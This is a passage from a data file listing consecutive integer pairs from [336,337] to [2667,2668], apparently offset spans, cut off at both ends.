36],[336,337],[337,338],[338,339],[339,340],[340,341],[341,342],[342,343],[343,344],[344,345],[345,346],[346,347],[347,348],[348,349],[349,350],[350,351],[351,352],[352,353],[353,354],[354,355],[355,356],[356,357],[357,358],[358,359],[359,360],[360,361],[361,362],[362,363],[363,364],[364,365],[365,366],[366,367],[367,368],[368,369],[369,370],[370,371],[371,372],[372,373],[373,374],[374,375],[375,376],[376,377],[377,378],[378,379],[379,380],[380,381],[381,382],[382,383],[383,384],[384,385],[385,386],[386,387],[387,388],[388,389],[389,390],[390,391],[391,392],[392,393],[393,394],[394,395],[395,396],[396,397],[397,398],[398,399],[399,400],[400,401],[401,402],[402,403],[403,404],[404,405],[405,406],[406,407],[407,408],[408,409],[409,410],[410,411],[411,412],[412,413],[413,414],[414,415],[415,416],[416,417],[417,418],[418,419],[419,420],[420,421],[421,422],[422,423],[423,424],[424,425],[425,426],[426,427],[427,428],[428,429],[429,430],[430,431],[431,432],[432,433],[433,434],[434,435],[435,436],[436,437],[437,438],[438,439],[439,440],[440,441],[441,442],[442,443],[443,444],[444,445],[445,446],[446,447],[447,448],[448,449],[449,450],[450,451],[451,452],[452,453],[453,454],[454,455],[455,456],[456,457],[457,458],[458,459],[459,460],[460,461],[461,462],[462,463],[463,464],[464,465],[465,466],[466,467],[467,468],[468,469],[469,470],[470,471],[471,472],[472,473],[473,474],[474,475],[475,476],[476,477],[477,478],[478,479],[479,480],[480,481],[481,482],[482,483],[483,484],[484,485],[485,486],[486,487],[487,488],[488,489],[489,490],[490,491],[491,492],[492,493],[493,494],[494,495],[495,496],[496,497],[497,498],[498,499],[499,500],[500,501],[501,502],[502,503],[503,504],[504,505],[505,506],[506,507],[507,508],[508,509],[509,510],[510,511],[511,512],[512,513],[513,514],[514,515],[515,516],[516,517],[517,518],[518,519],[519,520],[520,521],[521,522],[522,523],[523,524],[524,525],[525,526],[526,527],[527,528],[528,529],[529,530],[530,531],[531,532],[532,533],[533,534],[534,535],[535,536],[536,537],[537,538],[538,539],[539,540],[540,541],[541,542],[542,543],[543,544],[544,545],[545,546],[546,547],[547,548],[548,549],[549,550],[550,551],[551,552],[552,553],[553,554],[554,555],[555,556],[556,557],[557,558],[558,559],[559,560],[560,561],[561,562],[562,563],[563,564],[564,565],[565,566],[566,567],[567,568],[568,569],[569,570],[570,571],[571,572],[572,573],[573,574],[574,575],[575,576],[576,577],[577,578],[578,579],[579,580],[580,581],[581,582],[582,583],[583,584],[584,585],[585,586],[586,587],[587,588],[588,589],[589,590],[590,591],[591,592],[592,593],[593,594],[594,595],[595,596],[596,597],[597,598],[598,599],[599,600],[600,601],[601,602],[602,603],[603,604],[604,605],[605,606],[606,607],[607,608],[608,609],[609,610],[610,611],[611,612],[612,613],[613,614],[614,615],[615,616],[616,617],[617,618],[618,619],[619,620],[620,621],[621,622],[622,623],[623,624],[624,625],[625,626],[626,627],[627,628],[628,629],[629,630],[630,631],[631,632],[632,633],[633,634],[634,635],[635,636],[636,637],[637,638],[638,639],[639,640],[640,641],[641,642],[642,643],[643,644],[644,645],[645,646],[646,647],[647,648],[648,649],[649,650],[650,651],[651,652],[652,653],[653,654],[654,655],[655,656],[656,657],[657,658],[658,659],[659,660],[660,661],[661,662],[662,663],[663,664],[664,665],[665,666],[666,667],[667,668],[668,669],[669,670],[670,671],[671,672],[672,673],[673,674],[674,675],[675,676],[676,677],[677,678],[678,679],[679,680],[680,681],[681,682],[682,683],[683,684],[684,685],[685,686],[686,687],[687,688],[688,689],[689,690],[690,691],[691,692],[692,693],[693,694],[694,695],[695,696],[696,697],[697,698],[698,699],[699,700],[700,701],[701,702],[702,703],[703,704],[704,705],[705,706],[706,707],[707,708],[708,709],[709,710],[710,711],[711,712],[712,713],[713,714],[714,715],[715,716],[716,717],[717,718],[718,719],[719,720],[720,721],[721,722],[722,723],[723,724],[724,725],[725,726],[726,727],[727,728],[728,729],[729,730],[730,731],[731,732],[732,733],[733,734],[734,735],[735,736],[736,737],[737,738],[738,739],[739,740],[740,741],[741,742],[742,743],[743,744],[744,745],[745,746],[746,747],[747,748],[748,749],[749,750],[750,751],[751,752],[752,753],[753,754],[754,755],[755,756],[756,757],[757,758],[758,759],[759,760],[760,761],[761,762],[762,763],[763,764],[764,765],[765,766],[766,767],[767,768],[768,769],[769,770],[770,771],[771,772],[772,773],[773,774],[774,775],[775,776],[776,777],[777,778],[778,779],[779,780],[780,781],[781,782],[782,783],[783,784],[784,785],[785,786],[786,787],[787,788],[788,789],[789,790],[790,791],[791,792],[792,793],[793,794],[794,795],[795,796],[796,797],[797,798],[798,799],[799,800],[800,801],[801,802],[802,803],[803,804],[804,805],[805,806],[806,807],[807,808],[808,809],[809,810],[810,811],[811,812],[812,813],[813,814],[814,815],[815,816],[816,817],[817,818],[818,819],[819,820],[820,821],[821,822],[822,823],[823,824],[824,825],[825,826],[826,827],[827,828],[828,829],[829,830],[830,831],[831,832],[832,833],[833,834],[834,835],[835,836],[836,837],[837,838],[838,839],[839,840],[840,841],[841,842],[842,843],[843,844],[844,845],[845,846],[846,847],[847,848],[848,849],[849,850],[850,851],[851,852],[852,853],[853,854],[854,855],[855,856],[856,857],[857,858],[858,859],[859,860],[860,861],[861,862],[862,863],[863,864],[864,865],[865,866],[866,867],[867,868],[868,869],[869,870],[870,871],[871,872],[872,873],[873,874],[874,875],[875,876],[876,877],[877,878],[878,879],[879,880],[880,881],[881,882],[882,883],[883,884],[884,885],[885,886],[886,887],[887,888],[888,889],[889,890],[890,891],[891,892],[892,893],[893,894],[894,895],[895,896],[896,897],[897,898],[898,899],[899,900],[900,901],[901,902],[902,903],[903,904],[904,905],[905,906],[906,907],[907,908],[908,909],[909,910],[910,911],[911,912],[912,913],[913,914],[914,915],[915,916],[916,917],[917,918],[918,919],[919,920],[920,921],[921,922],[922,923],[923,924],[924,925],[925,926],[926,927],[927,928],[928,929],[929,930],[930,931],[931,932],[932,933],[933,934],[934,935],[935,936],[936,937],[937,938],[938,939],[939,940],[940,941],[941,942],[942,943],[943,944],[944,945],[945,946],[946,947],[947,948],[948,949],[949,950],[950,951],[951,952],[952,953],[953,954],[954,955],[955,956],[956,957],[957,958],[958,959],[959,960],[960,961],[961,962],[962,963],[963,964],[964,965],[965,966],[966,967],[967,968],[968,969],[969,970],[970,971],[971,972],[972,973],[973,974],[974,975],[975,976],[976,977],[977,978],[978,979],[979,980],[980,981],[981,982],[982,983],[983,984],[984,985],[985,986],[986,987],[987,988],[988,989],[989,990],[990,991],[991,992],[992,993],[993,994],[994,995],[995,996],[996,997],[997,998],[998,999],[999,1000],[1000,1001],[1001,1002],[1002,1003],[1003,1004],[1004,1005],[1005,1006],[1006,1007],[1007,1008],[1008,1009],[1009,1010],[1010,1011],[1011,1012],[1012,1013],[1013,1014],[1014,1015],[1015,1016],[1016,1017],[1017,1018],[1018,1019],[1019,1020],[1020,1021],[1021,1022],[1022,1023],[1023,1024],[1024,1025],[1025,1026],[1026,1027],[1027,1028],[1028,1029],[1029,1030],[1030,1031],[1031,1032],[1032,1033],[1033,1034],[1034,1035],[1035,1036],[1036,1037],[1037,1038],[1038,1039],[1039,1040],[1040,1041],[1041,1042],[1042,1043],[1043,1044],[1044,1045],[1045,1046],[1046,1047],[1047,1048],[1048,1049],[1049,1050],[1050,1051],[1051,1052],[1052,1053],[1053,1054],[1054,1055],[1055,1056],[1056,1057],[1057,1058],[1058,1059],[1059,1060],[1060,1061],[1061,1062],[1062,1063],[1063,1064],[1064,1065],[1065,1066],[1066,1067],[1067,1068],[1068,1069],[1069,1070],[1070,1071],[1071,1072],[1072,1073],[1073,1074],[1074,1075],[1075,1076],[1076,1077],[1077,1078],[1078,1079],[1079,1080],[1080,1081],[1081,1082],[1082,1083],[1083,1084],[1084,1085],[1085,1086],[1086,1087],[1087,1088],[1088,1089],[1089,1090],[1090,1091],[1091,1092],[1092,1093],[1093,1094],[1094,1095],[1095,1096],[1096,1097],[1097,1098],[1098,1099],[1099,1100],[1100,1101],[1101,1102],[1102,1103],[1103,1104],[1104,1105],[1105,1106],[1106,1107],[1107,1108],[1108,1109],[1109,1110],[1110,1111],[1111,1112],[1112,1113],[1113,1114],[1114,1115],[1115,1116],[1116,1117],[1117,1118],[1118,1119],[1119,1120],[1120,1121],[1121,1122],[1122,1123],[1123,1124],[1124,1125],[1125,1126],[1126,1127],[1127,1128],[1128,1129],[1129,1130],[1130,1131],[1131,1132],[1132,1133],[1133,1134],[1134,1135],[1135,1136],[1136,1137],[1137,1138],[1138,1139],[1139,1140],[1140,1141],[1141,1142],[1142,1143],[1143,1144],[1144,1145],[1145,1146],[1146,1147],[1147,1148],[1148,1149],[1149,1150],[1150,1151],[1151,1152],[1152,1153],[1153,1154],[1154,1155],[1155,1156],[1156,1157],[1157,1158],[1158,1159],[1159,1160],[1160,1161],[1161,1162],[1162,1163],[1163,1164],[1164,1165],[1165,1166],[1166,1167],[1167,1168],[1168,1169],[1169,1170],[1170,1171],[1171,1172],[1172,1173],[1173,1174],[1174,1175],[1175,1176],[1176,1177],[1177,1178],[1178,1179],[1179,1180],[1180,1181],[1181,1182],[1182,1183],[1183,1184],[1184,1185],[1185,1186],[1186,1187],[1187,1188],[1188,1189],[1189,1190],[1190,1191],[1191,1192],[1192,1193],[1193,1194],[1194,1195],[1195,1196],[1196,1197],[1197,1198],[1198,1199],[1199,1200],[1200,1201],[1201,1202],[1202,1203],[1203,1204],[1204,1205],[1205,1206],[1206,1207],[1207,1208],[1208,1209],[1209,1210],[1210,1211],[1211,1212],[1212,1213],[1213,1214],[1214,1215],[1215,1216],[1216,1217],[1217,1218],[1218,1219],[1219,1220],[1220,1221],[1221,1222],[1222,1223],[1223,1224],[1224,1225],[1225,1226],[1226,1227],[1227,1228],[1228,1229],[1229,1230],[1230,1231],[1231,1232],[1232,1233],[1233,1234],[1234,1235],[1235,1236],[1236,1237],[1237,1238],[1238,1239],[1239,1240],[1240,1241],[1241,1242],[1242,1243],[1243,1244],[1244,1245],[1245,1246],[1246,1247],[1247,1248],[1248,1249],[1249,1250],[1250,1251],[1251,1252],[1252,1253],[1253,1254],[1254,1255],[1255,1256],[1256,1257],[1257,1258],[1258,1259],[1259,1260],[1260,1261],[1261,1262],[1262,1263],[1263,1264],[1264,1265],[1265,1266],[1266,1267],[1267,1268],[1268,1269],[1269,1270],[1270,1271],[1271,1272],[1272,1273],[1273,1274],[1274,1275],[1275,1276],[1276,1277],[1277,1278],[1278,1279],[1279,1280],[1280,1281],[1281,1282],[1282,1283],[1283,1284],[1284,1285],[1285,1286],[1286,1287],[1287,1288],[1288,1289],[1289,1290],[1290,1291],[1291,1292],[1292,1293],[1293,1294],[1294,1295],[1295,1296],[1296,1297],[1297,1298],[1298,1299],[1299,1300],[1300,1301],[1301,1302],[1302,1303],[1303,1304],[1304,1305],[1305,1306],[1306,1307],[1307,1308],[1308,1309],[1309,1310],[1310,1311],[1311,1312],[1312,1313],[1313,1314],[1314,1315],[1315,1316],[1316,1317],[1317,1318],[1318,1319],[1319,1320],[1320,1321],[1321,1322],[1322,1323],[1323,1324],[1324,1325],[1325,1326],[1326,1327],[1327,1328],[1328,1329],[1329,1330],[1330,1331],[1331,1332],[1332,1333],[1333,1334],[1334,1335],[1335,1336],[1336,1337],[1337,1338],[1338,1339],[1339,1340],[1340,1341],[1341,1342],[1342,1343],[1343,1344],[1344,1345],[1345,1346],[1346,1347],[1347,1348],[1348,1349],[1349,1350],[1350,1351],[1351,1352],[1352,1353],[1353,1354],[1354,1355],[1355,1356],[1356,1357],[1357,1358],[1358,1359],[1359,1360],[1360,1361],[1361,1362],[1362,1363],[1363,1364],[1364,1365],[1365,1366],[1366,1367],[1367,1368],[1368,1369],[1369,1370],[1370,1371],[1371,1372],[1372,1373],[1373,1374],[1374,1375],[1375,1376],[1376,1377],[1377,1378],[1378,1379],[1379,1380],[1380,1381],[1381,1382],[1382,1383],[1383,1384],[1384,1385],[1385,1386],[1386,1387],[1387,1388],[1388,1389],[1389,1390],[1390,1391],[1391,1392],[1392,1393],[1393,1394],[1394,1395],[1395,1396],[1396,1397],[1397,1398],[1398,1399],[1399,1400],[1400,1401],[1401,1402],[1402,1403],[1403,1404],[1404,1405],[1405,1406],[1406,1407],[1407,1408],[1408,1409],[1409,1410],[1410,1411],[1411,1412],[1412,1413],[1413,1414],[1414,1415],[1415,1416],[1416,1417],[1417,1418],[1418,1419],[1419,1420],[1420,1421],[1421,1422],[1422,1423],[1423,1424],[1424,1425],[1425,1426],[1426,1427],[1427,1428],[1428,1429],[1429,1430],[1430,1431],[1431,1432],[1432,1433],[1433,1434],[1434,1435],[1435,1436],[1436,1437],[1437,1438],[1438,1439],[1439,1440],[1440,1441],[1441,1442],[1442,1443],[1443,1444],[1444,1445],[1445,1446],[1446,1447],[1447,1448],[1448,1449],[1449,1450],[1450,1451],[1451,1452],[1452,1453],[1453,1454],[1454,1455],[1455,1456],[1456,1457],[1457,1458],[1458,1459],[1459,1460],[1460,1461],[1461,1462],[1462,1463],[1463,1464],[1464,1465],[1465,1466],[1466,1467],[1467,1468],[1468,1469],[1469,1470],[1470,1471],[1471,1472],[1472,1473],[1473,1474],[1474,1475],[1475,1476],[1476,1477],[1477,1478],[1478,1479],[1479,1480],[1480,1481],[1481,1482],[1482,1483],[1483,1484],[1484,1485],[1485,1486],[1486,1487],[1487,1488],[1488,1489],[1489,1490],[1490,1491],[1491,1492],[1492,1493],[1493,1494],[1494,1495],[1495,1496],[1496,1497],[1497,1498],[1498,1499],[1499,1500],[1500,1501],[1501,1502],[1502,1503],[1503,1504],[1504,1505],[1505,1506],[1506,1507],[1507,1508],[1508,1509],[1509,1510],[1510,1511],[1511,1512],[1512,1513],[1513,1514],[1514,1515],[1515,1516],[1516,1517],[1517,1518],[1518,1519],[1519,1520],[1520,1521],[1521,1522],[1522,1523],[1523,1524],[1524,1525],[1525,1526],[1526,1527],[1527,1528],[1528,1529],[1529,1530],[1530,1531],[1531,1532],[1532,1533],[1533,1534],[1534,1535],[1535,1536],[1536,1537],[1537,1538],[1538,1539],[1539,1540],[1540,1541],[1541,1542],[1542,1543],[1543,1544],[1544,1545],[1545,1546],[1546,1547],[1547,1548],[1548,1549],[1549,1550],[1550,1551],[1551,1552],[1552,1553],[1553,1554],[1554,1555],[1555,1556],[1556,1557],[1557,1558],[1558,1559],[1559,1560],[1560,1561],[1561,1562],[1562,1563],[1563,1564],[1564,1565],[1565,1566],[1566,1567],[1567,1568],[1568,1569],[1569,1570],[1570,1571],[1571,1572],[1572,1573],[1573,1574],[1574,1575],[1575,1576],[1576,1577],[1577,1578],[1578,1579],[1579,1580],[1580,1581],[1581,1582],[1582,1583],[1583,1584],[1584,1585],[1585,1586],[1586,1587],[1587,1588],[1588,1589],[1589,1590],[1590,1591],[1591,1592],[1592,1593],[1593,1594],[1594,1595],[1595,1596],[1596,1597],[1597,1598],[1598,1599],[1599,1600],[1600,1601],[1601,1602],[1602,1603],[1603,1604],[1604,1605],[1605,1606],[1606,1607],[1607,1608],[1608,1609],[1609,1610],[1610,1611],[1611,1612],[1612,1613],[1613,1614],[1614,1615],[1615,1616],[1616,1617],[1617,1618],[1618,1619],[1619,1620],[1620,1621],[1621,1622],[1622,1623],[1623,1624],[1624,1625],[1625,1626],[1626,1627],[1627,1628],[1628,1629],[1629,1630],[1630,1631],[1631,1632],[1632,1633],[1633,1634],[1634,1635],[1635,1636],[1636,1637],[1637,1638],[1638,1639],[1639,1640],[1640,1641],[1641,1642],[1642,1643],[1643,1644],[1644,1645],[1645,1646],[1646,1647],[1647,1648],[1648,1649],[1649,1650],[1650,1651],[1651,1652],[1652,1653],[1653,1654],[1654,1655],[1655,1656],[1656,1657],[1657,1658],[1658,1659],[1659,1660],[1660,1661],[1661,1662],[1662,1663],[1663,1664],[1664,1665],[1665,1666],[1666,1667],[1667,1668],[1668,1669],[1669,1670],[1670,1671],[1671,1672],[1672,1673],[1673,1674],[1674,1675],[1675,1676],[1676,1677],[1677,1678],[1678,1679],[1679,1680],[1680,1681],[1681,1682],[1682,1683],[1683,1684],[1684,1685],[1685,1686],[1686,1687],[1687,1688],[1688,1689],[1689,1690],[1690,1691],[1691,1692],[1692,1693],[1693,1694],[1694,1695],[1695,1696],[1696,1697],[1697,1698],[1698,1699],[1699,1700],[1700,1701],[1701,1702],[1702,1703],[1703,1704],[1704,1705],[1705,1706],[1706,1707],[1707,1708],[1708,1709],[1709,1710],[1710,1711],[1711,1712],[1712,1713],[1713,1714],[1714,1715],[1715,1716],[1716,1717],[1717,1718],[1718,1719],[1719,1720],[1720,1721],[1721,1722],[1722,1723],[1723,1724],[1724,1725],[1725,1726],[1726,1727],[1727,1728],[1728,1729],[1729,1730],[1730,1731],[1731,1732],[1732,1733],[1733,1734],[1734,1735],[1735,1736],[1736,1737],[1737,1738],[1738,1739],[1739,1740],[1740,1741],[1741,1742],[1742,1743],[1743,1744],[1744,1745],[1745,1746],[1746,1747],[1747,1748],[1748,1749],[1749,1750],[1750,1751],[1751,1752],[1752,1753],[1753,1754],[1754,1755],[1755,1756],[1756,1757],[1757,1758],[1758,1759],[1759,1760],[1760,1761],[1761,1762],[1762,1763],[1763,1764],[1764,1765],[1765,1766],[1766,1767],[1767,1768],[1768,1769],[1769,1770],[1770,1771],[1771,1772],[1772,1773],[1773,1774],[1774,1775],[1775,1776],[1776,1777],[1777,1778],[1778,1779],[1779,1780],[1780,1781],[1781,1782],[1782,1783],[1783,1784],[1784,1785],[1785,1786],[1786,1787],[1787,1788],[1788,1789],[1789,1790],[1790,1791],[1791,1792],[1792,1793],[1793,1794],[1794,1795],[1795,1796],[1796,1797],[1797,1798],[1798,1799],[1799,1800],[1800,1801],[1801,1802],[1802,1803],[1803,1804],[1804,1805],[1805,1806],[1806,1807],[1807,1808],[1808,1809],[1809,1810],[1810,1811],[1811,1812],[1812,1813],[1813,1814],[1814,1815],[1815,1816],[1816,1817],[1817,1818],[1818,1819],[1819,1820],[1820,1821],[1821,1822],[1822,1823],[1823,1824],[1824,1825],[1825,1826],[1826,1827],[1827,1828],[1828,1829],[1829,1830],[1830,1831],[1831,1832],[1832,1833],[1833,1834],[1834,1835],[1835,1836],[1836,1837],[1837,1838],[1838,1839],[1839,1840],[1840,1841],[1841,1842],[1842,1843],[1843,1844],[1844,1845],[1845,1846],[1846,1847],[1847,1848],[1848,1849],[1849,1850],[1850,1851],[1851,1852],[1852,1853],[1853,1854],[1854,1855],[1855,1856],[1856,1857],[1857,1858],[1858,1859],[1859,1860],[1860,1861],[1861,1862],[1862,1863],[1863,1864],[1864,1865],[1865,1866],[1866,1867],[1867,1868],[1868,1869],[1869,1870],[1870,1871],[1871,1872],[1872,1873],[1873,1874],[1874,1875],[1875,1876],[1876,1877],[1877,1878],[1878,1879],[1879,1880],[1880,1881],[1881,1882],[1882,1883],[1883,1884],[1884,1885],[1885,1886],[1886,1887],[1887,1888],[1888,1889],[1889,1890],[1890,1891],[1891,1892],[1892,1893],[1893,1894],[1894,1895],[1895,1896],[1896,1897],[1897,1898],[1898,1899],[1899,1900],[1900,1901],[1901,1902],[1902,1903],[1903,1904],[1904,1905],[1905,1906],[1906,1907],[1907,1908],[1908,1909],[1909,1910],[1910,1911],[1911,1912],[1912,1913],[1913,1914],[1914,1915],[1915,1916],[1916,1917],[1917,1918],[1918,1919],[1919,1920],[1920,1921],[1921,1922],[1922,1923],[1923,1924],[1924,1925],[1925,1926],[1926,1927],[1927,1928],[1928,1929],[1929,1930],[1930,1931],[1931,1932],[1932,1933],[1933,1934],[1934,1935],[1935,1936],[1936,1937],[1937,1938],[1938,1939],[1939,1940],[1940,1941],[1941,1942],[1942,1943],[1943,1944],[1944,1945],[1945,1946],[1946,1947],[1947,1948],[1948,1949],[1949,1950],[1950,1951],[1951,1952],[1952,1953],[1953,1954],[1954,1955],[1955,1956],[1956,1957],[1957,1958],[1958,1959],[1959,1960],[1960,1961],[1961,1962],[1962,1963],[1963,1964],[1964,1965],[1965,1966],[1966,1967],[1967,1968],[1968,1969],[1969,1970],[1970,1971],[1971,1972],[1972,1973],[1973,1974],[1974,1975],[1975,1976],[1976,1977],[1977,1978],[1978,1979],[1979,1980],[1980,1981],[1981,1982],[1982,1983],[1983,1984],[1984,1985],[1985,1986],[1986,1987],[1987,1988],[1988,1989],[1989,1990],[1990,1991],[1991,1992],[1992,1993],[1993,1994],[1994,1995],[1995,1996],[1996,1997],[1997,1998],[1998,1999],[1999,2000],[2000,2001],[2001,2002],[2002,2003],[2003,2004],[2004,2005],[2005,2006],[2006,2007],[2007,2008],[2008,2009],[2009,2010],[2010,2011],[2011,2012],[2012,2013],[2013,2014],[2014,2015],[2015,2016],[2016,2017],[2017,2018],[2018,2019],[2019,2020],[2020,2021],[2021,2022],[2022,2023],[2023,2024],[2024,2025],[2025,2026],[2026,2027],[2027,2028],[2028,2029],[2029,2030],[2030,2031],[2031,2032],[2032,2033],[2033,2034],[2034,2035],[2035,2036],[2036,2037],[2037,2038],[2038,2039],[2039,2040],[2040,2041],[2041,2042],[2042,2043],[2043,2044],[2044,2045],[2045,2046],[2046,2047],[2047,2048],[2048,2049],[2049,2050],[2050,2051],[2051,2052],[2052,2053],[2053,2054],[2054,2055],[2055,2056],[2056,2057],[2057,2058],[2058,2059],[2059,2060],[2060,2061],[2061,2062],[2062,2063],[2063,2064],[2064,2065],[2065,2066],[2066,2067],[2067,2068],[2068,2069],[2069,2070],[2070,2071],[2071,2072],[2072,2073],[2073,2074],[2074,2075],[2075,2076],[2076,2077],[2077,2078],[2078,2079],[2079,2080],[2080,2081],[2081,2082],[2082,2083],[2083,2084],[2084,2085],[2085,2086],[2086,2087],[2087,2088],[2088,2089],[2089,2090],[2090,2091],[2091,2092],[2092,2093],[2093,2094],[2094,2095],[2095,2096],[2096,2097],[2097,2098],[2098,2099],[2099,2100],[2100,2101],[2101,2102],[2102,2103],[2103,2104],[2104,2105],[2105,2106],[2106,2107],[2107,2108],[2108,2109],[2109,2110],[2110,2111],[2111,2112],[2112,2113],[2113,2114],[2114,2115],[2115,2116],[2116,2117],[2117,2118],[2118,2119],[2119,2120],[2120,2121],[2121,2122],[2122,2123],[2123,2124],[2124,2125],[2125,2126],[2126,2127],[2127,2128],[2128,2129],[2129,2130],[2130,2131],[2131,2132],[2132,2133],[2133,2134],[2134,2135],[2135,2136],[2136,2137],[2137,2138],[2138,2139],[2139,2140],[2140,2141],[2141,2142],[2142,2143],[2143,2144],[2144,2145],[2145,2146],[2146,2147],[2147,2148],[2148,2149],[2149,2150],[2150,2151],[2151,2152],[2152,2153],[2153,2154],[2154,2155],[2155,2156],[2156,2157],[2157,2158],[2158,2159],[2159,2160],[2160,2161],[2161,2162],[2162,2163],[2163,2164],[2164,2165],[2165,2166],[2166,2167],[2167,2168],[2168,2169],[2169,2170],[2170,2171],[2171,2172],[2172,2173],[2173,2174],[2174,2175],[2175,2176],[2176,2177],[2177,2178],[2178,2179],[2179,2180],[2180,2181],[2181,2182],[2182,2183],[2183,2184],[2184,2185],[2185,2186],[2186,2187],[2187,2188],[2188,2189],[2189,2190],[2190,2191],[2191,2192],[2192,2193],[2193,2194],[2194,2195],[2195,2196],[2196,2197],[2197,2198],[2198,2199],[2199,2200],[2200,2201],[2201,2202],[2202,2203],[2203,2204],[2204,2205],[2205,2206],[2206,2207],[2207,2208],[2208,2209],[2209,2210],[2210,2211],[2211,2212],[2212,2213],[2213,2214],[2214,2215],[2215,2216],[2216,2217],[2217,2218],[2218,2219],[2219,2220],[2220,2221],[2221,2222],[2222,2223],[2223,2224],[2224,2225],[2225,2226],[2226,2227],[2227,2228],[2228,2229],[2229,2230],[2230,2231],[2231,2232],[2232,2233],[2233,2234],[2234,2235],[2235,2236],[2236,2237],[2237,2238],[2238,2239],[2239,2240],[2240,2241],[2241,2242],[2242,2243],[2243,2244],[2244,2245],[2245,2246],[2246,2247],[2247,2248],[2248,2249],[2249,2250],[2250,2251],[2251,2252],[2252,2253],[2253,2254],[2254,2255],[2255,2256],[2256,2257],[2257,2258],[2258,2259],[2259,2260],[2260,2261],[2261,2262],[2262,2263],[2263,2264],[2264,2265],[2265,2266],[2266,2267],[2267,2268],[2268,2269],[2269,2270],[2270,2271],[2271,2272],[2272,2273],[2273,2274],[2274,2275],[2275,2276],[2276,2277],[2277,2278],[2278,2279],[2279,2280],[2280,2281],[2281,2282],[2282,2283],[2283,2284],[2284,2285],[2285,2286],[2286,2287],[2287,2288],[2288,2289],[2289,2290],[2290,2291],[2291,2292],[2292,2293],[2293,2294],[2294,2295],[2295,2296],[2296,2297],[2297,2298],[2298,2299],[2299,2300],[2300,2301],[2301,2302],[2302,2303],[2303,2304],[2304,2305],[2305,2306],[2306,2307],[2307,2308],[2308,2309],[2309,2310],[2310,2311],[2311,2312],[2312,2313],[2313,2314],[2314,2315],[2315,2316],[2316,2317],[2317,2318],[2318,2319],[2319,2320],[2320,2321],[2321,2322],[2322,2323],[2323,2324],[2324,2325],[2325,2326],[2326,2327],[2327,2328],[2328,2329],[2329,2330],[2330,2331],[2331,2332],[2332,2333],[2333,2334],[2334,2335],[2335,2336],[2336,2337],[2337,2338],[2338,2339],[2339,2340],[2340,2341],[2341,2342],[2342,2343],[2343,2344],[2344,2345],[2345,2346],[2346,2347],[2347,2348],[2348,2349],[2349,2350],[2350,2351],[2351,2352],[2352,2353],[2353,2354],[2354,2355],[2355,2356],[2356,2357],[2357,2358],[2358,2359],[2359,2360],[2360,2361],[2361,2362],[2362,2363],[2363,2364],[2364,2365],[2365,2366],[2366,2367],[2367,2368],[2368,2369],[2369,2370],[2370,2371],[2371,2372],[2372,2373],[2373,2374],[2374,2375],[2375,2376],[2376,2377],[2377,2378],[2378,2379],[2379,2380],[2380,2381],[2381,2382],[2382,2383],[2383,2384],[2384,2385],[2385,2386],[2386,2387],[2387,2388],[2388,2389],[2389,2390],[2390,2391],[2391,2392],[2392,2393],[2393,2394],[2394,2395],[2395,2396],[2396,2397],[2397,2398],[2398,2399],[2399,2400],[2400,2401],[2401,2402],[2402,2403],[2403,2404],[2404,2405],[2405,2406],[2406,2407],[2407,2408],[2408,2409],[2409,2410],[2410,2411],[2411,2412],[2412,2413],[2413,2414],[2414,2415],[2415,2416],[2416,2417],[2417,2418],[2418,2419],[2419,2420],[2420,2421],[2421,2422],[2422,2423],[2423,2424],[2424,2425],[2425,2426],[2426,2427],[2427,2428],[2428,2429],[2429,2430],[2430,2431],[2431,2432],[2432,2433],[2433,2434],[2434,2435],[2435,2436],[2436,2437],[2437,2438],[2438,2439],[2439,2440],[2440,2441],[2441,2442],[2442,2443],[2443,2444],[2444,2445],[2445,2446],[2446,2447],[2447,2448],[2448,2449],[2449,2450],[2450,2451],[2451,2452],[2452,2453],[2453,2454],[2454,2455],[2455,2456],[2456,2457],[2457,2458],[2458,2459],[2459,2460],[2460,2461],[2461,2462],[2462,2463],[2463,2464],[2464,2465],[2465,2466],[2466,2467],[2467,2468],[2468,2469],[2469,2470],[2470,2471],[2471,2472],[2472,2473],[2473,2474],[2474,2475],[2475,2476],[2476,2477],[2477,2478],[2478,2479],[2479,2480],[2480,2481],[2481,2482],[2482,2483],[2483,2484],[2484,2485],[2485,2486],[2486,2487],[2487,2488],[2488,2489],[2489,2490],[2490,2491],[2491,2492],[2492,2493],[2493,2494],[2494,2495],[2495,2496],[2496,2497],[2497,2498],[2498,2499],[2499,2500],[2500,2501],[2501,2502],[2502,2503],[2503,2504],[2504,2505],[2505,2506],[2506,2507],[2507,2508],[2508,2509],[2509,2510],[2510,2511],[2511,2512],[2512,2513],[2513,2514],[2514,2515],[2515,2516],[2516,2517],[2517,2518],[2518,2519],[2519,2520],[2520,2521],[2521,2522],[2522,2523],[2523,2524],[2524,2525],[2525,2526],[2526,2527],[2527,2528],[2528,2529],[2529,2530],[2530,2531],[2531,2532],[2532,2533],[2533,2534],[2534,2535],[2535,2536],[2536,2537],[2537,2538],[2538,2539],[2539,2540],[2540,2541],[2541,2542],[2542,2543],[2543,2544],[2544,2545],[2545,2546],[2546,2547],[2547,2548],[2548,2549],[2549,2550],[2550,2551],[2551,2552],[2552,2553],[2553,2554],[2554,2555],[2555,2556],[2556,2557],[2557,2558],[2558,2559],[2559,2560],[2560,2561],[2561,2562],[2562,2563],[2563,2564],[2564,2565],[2565,2566],[2566,2567],[2567,2568],[2568,2569],[2569,2570],[2570,2571],[2571,2572],[2572,2573],[2573,2574],[2574,2575],[2575,2576],[2576,2577],[2577,2578],[2578,2579],[2579,2580],[2580,2581],[2581,2582],[2582,2583],[2583,2584],[2584,2585],[2585,2586],[2586,2587],[2587,2588],[2588,2589],[2589,2590],[2590,2591],[2591,2592],[2592,2593],[2593,2594],[2594,2595],[2595,2596],[2596,2597],[2597,2598],[2598,2599],[2599,2600],[2600,2601],[2601,2602],[2602,2603],[2603,2604],[2604,2605],[2605,2606],[2606,2607],[2607,2608],[2608,2609],[2609,2610],[2610,2611],[2611,2612],[2612,2613],[2613,2614],[2614,2615],[2615,2616],[2616,2617],[2617,2618],[2618,2619],[2619,2620],[2620,2621],[2621,2622],[2622,2623],[2623,2624],[2624,2625],[2625,2626],[2626,2627],[2627,2628],[2628,2629],[2629,2630],[2630,2631],[2631,2632],[2632,2633],[2633,2634],[2634,2635],[2635,2636],[2636,2637],[2637,2638],[2638,2639],[2639,2640],[2640,2641],[2641,2642],[2642,2643],[2643,2644],[2644,2645],[2645,2646],[2646,2647],[2647,2648],[2648,2649],[2649,2650],[2650,2651],[2651,2652],[2652,2653],[2653,2654],[2654,2655],[2655,2656],[2656,2657],[2657,2658],[2658,2659],[2659,2660],[2660,2661],[2661,2662],[2662,2663],[2663,2664],[2664,2665],[2665,2666],[2666,2667],[2667,2668],[